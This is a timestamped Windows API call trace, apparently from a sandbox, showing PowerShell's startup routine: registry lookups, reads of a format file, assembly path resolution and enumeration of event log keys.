	[0143.904] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7ad950, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0143.904] CoTaskMemFree (pv=0x1b7ad950) 
	[0143.904] RegCloseKey (hKey=0x318) returned 0x0
	[0143.905] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x502fa555, Data2=0xbc49, Data3=0x4d41, Data4=([0]=0x80, [1]=0xde, [2]=0xc9, [3]=0xba, [4]=0xac, [5]=0x84, [6]=0xce, [7]=0x39))) returned 0x0
	[0143.905] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xaa27f5e, Data2=0xc692, Data3=0x4831, Data4=([0]=0x96, [1]=0x28, [2]=0xda, [3]=0xcd, [4]=0x27, [5]=0xd8, [6]=0x1a, [7]=0x42))) returned 0x0
	[0143.906] SetErrorMode (uMode=0x1) returned 0x1
	[0143.906] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0143.906] SetErrorMode (uMode=0x1) returned 0x1
	[0143.906] GetFileType (hFile=0x318) returned 0x1
	[0143.906] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.907] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.907] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0144.005] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0144.006] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0xe98, lpOverlapped=0x0) returned 1
	[0144.006] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5030, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5030*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0144.006] ReadFile (in: hFile=0x318, lpBuffer=0x3cf5a30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3cf5a30*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0144.007] SetErrorMode (uMode=0x1) returned 0x1
	[0144.007] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0144.007] SetErrorMode (uMode=0x1) returned 0x1
	[0144.007] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x318) returned 0x0
	[0144.007] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0144.007] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ad950
	[0144.007] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7ad950, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0144.007] CoTaskMemFree (pv=0x1b7ad950) 
	[0144.007] RegCloseKey (hKey=0x318) returned 0x0
	[0144.008] VirtualQuery (in: lpAddress=0x14ba40, lpBuffer=0x14c900, dwLength=0x30 | out: lpBuffer=0x14c900*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0144.009] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x41505ea1, Data2=0xb79, Data3=0x4518, Data4=([0]=0xbb, [1]=0xa1, [2]=0x39, [3]=0x37, [4]=0x45, [5]=0x95, [6]=0x53, [7]=0xaa))) returned 0x0
	[0144.009] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xaceab0fb, Data2=0xc78e, Data3=0x492a, Data4=([0]=0xbb, [1]=0x28, [2]=0xc6, [3]=0x9f, [4]=0xb8, [5]=0x7e, [6]=0x6b, [7]=0x78))) returned 0x0
	[0144.029] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0144.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0144.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0144.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0144.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0144.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0144.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0144.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0144.159] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0144.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14cf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0144.324] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.324] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.324] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.325] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.325] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.327] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.327] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.328] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.329] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.432] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.433] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.434] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.434] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.434] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.435] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.440] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d1b8 | out: phkResult=0x14d1b8*=0x318) returned 0x0
	[0144.455] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d0bc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0b8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d0bc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0b8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.455] CoTaskMemFree (pv=0x0) 
	[0144.456] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.456] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x19eeb0, lpcchValueName=0x14d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.456] CoTaskMemFree (pv=0x19eeb0) 
	[0144.456] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.456] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x19eeb0, lpcchValueName=0x14d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.456] CoTaskMemFree (pv=0x19eeb0) 
	[0144.456] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.456] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x19eeb0, lpcchValueName=0x14d168, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d168, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.456] CoTaskMemFree (pv=0x19eeb0) 
	[0144.457] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d14c, lpData=0x0, lpcbData=0x14d148*=0x0 | out: lpType=0x14d14c*=0x1, lpData=0x0, lpcbData=0x14d148*=0x8) returned 0x0
	[0144.457] CoTaskMemAlloc (cb=0xc) returned 0x1b7cfa00
	[0144.457] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d11c, lpData=0x1b7cfa00, lpcbData=0x14d118*=0x8 | out: lpType=0x14d11c*=0x1, lpData="2.0", lpcbData=0x14d118*=0x8) returned 0x0
	[0144.457] CoTaskMemFree (pv=0x1b7cfa00) 
	[0144.608] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d108 | out: phkResult=0x14d108*=0x31c) returned 0x0
	[0144.608] RegQueryInfoKeyW (in: hKey=0x31c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d00c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d008, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d00c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d008*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.608] CoTaskMemFree (pv=0x0) 
	[0144.608] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.608] RegEnumValueW (in: hKey=0x31c, dwIndex=0x0, lpValueName=0x19eeb0, lpcchValueName=0x14d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x14d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.608] CoTaskMemFree (pv=0x19eeb0) 
	[0144.608] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.608] RegEnumValueW (in: hKey=0x31c, dwIndex=0x1, lpValueName=0x19eeb0, lpcchValueName=0x14d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x14d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.608] CoTaskMemFree (pv=0x19eeb0) 
	[0144.608] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.609] RegEnumValueW (in: hKey=0x31c, dwIndex=0x2, lpValueName=0x19eeb0, lpcchValueName=0x14d0b8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x14d0b8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0144.609] CoTaskMemFree (pv=0x19eeb0) 
	[0144.609] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d09c, lpData=0x0, lpcbData=0x14d098*=0x0 | out: lpType=0x14d09c*=0x1, lpData=0x0, lpcbData=0x14d098*=0x8) returned 0x0
	[0144.609] CoTaskMemAlloc (cb=0xc) returned 0x1b7cf920
	[0144.609] RegQueryValueExW (in: hKey=0x31c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x14d06c, lpData=0x1b7cf920, lpcbData=0x14d068*=0x8 | out: lpType=0x14d06c*=0x1, lpData="2.0", lpcbData=0x14d068*=0x8) returned 0x0
	[0144.609] CoTaskMemFree (pv=0x1b7cf920) 
	[0144.610] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.610] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.726] CoTaskMemAlloc (cb=0x104) returned 0x1b7a4040
	[0144.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a4040, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0144.726] CoTaskMemFree (pv=0x1b7a4040) 
	[0144.752] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d138 | out: phkResult=0x14d138*=0x334) returned 0x0
	[0144.757] RegQueryInfoKeyW (in: hKey=0x334, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x14d0ac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0a8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x14d0ac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x14d0a8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.757] CoTaskMemFree (pv=0x0) 
	[0144.758] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.758] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x0, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.758] CoTaskMemFree (pv=0x19eeb0) 
	[0144.758] CoTaskMemFree (pv=0x0) 
	[0144.758] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.758] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x1, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.758] CoTaskMemFree (pv=0x19eeb0) 
	[0144.758] CoTaskMemFree (pv=0x0) 
	[0144.758] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.758] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x2, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.759] CoTaskMemFree (pv=0x19eeb0) 
	[0144.759] CoTaskMemFree (pv=0x0) 
	[0144.759] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.759] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x3, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.759] CoTaskMemFree (pv=0x19eeb0) 
	[0144.759] CoTaskMemFree (pv=0x0) 
	[0144.759] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.759] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x4, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.759] CoTaskMemFree (pv=0x19eeb0) 
	[0144.759] CoTaskMemFree (pv=0x0) 
	[0144.759] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.759] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x5, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.759] CoTaskMemFree (pv=0x19eeb0) 
	[0144.759] CoTaskMemFree (pv=0x0) 
	[0144.759] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.759] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x6, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.759] CoTaskMemFree (pv=0x19eeb0) 
	[0144.759] CoTaskMemFree (pv=0x0) 
	[0144.759] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.759] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x7, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.760] CoTaskMemFree (pv=0x19eeb0) 
	[0144.760] CoTaskMemFree (pv=0x0) 
	[0144.760] CoTaskMemAlloc (cb=0x204) returned 0x19eeb0
	[0144.760] RegEnumKeyExW (in: hKey=0x334, dwIndex=0x8, lpName=0x19eeb0, lpcchName=0x14d138, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x14d138, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0144.760] CoTaskMemFree (pv=0x19eeb0) 
	[0144.760] CoTaskMemFree (pv=0x0) 
	[0144.760] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x33c) returned 0x0
	[0144.760] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.760] RegOpenKeyExW (in: hKey=0x334, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x314) returned 0x0
	[0144.760] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.760] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x344) returned 0x0
	[0144.761] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.761] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x348) returned 0x0
	[0144.761] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.761] RegOpenKeyExW (in: hKey=0x334, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x34c) returned 0x0
	[0144.761] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
	[0144.761] RegOpenKeyExW (in: hKey=0x334, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x350) returned 0x0
	[0144.761] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d198 | out: phkResult=0x14d198*=0x0) returned 0x2
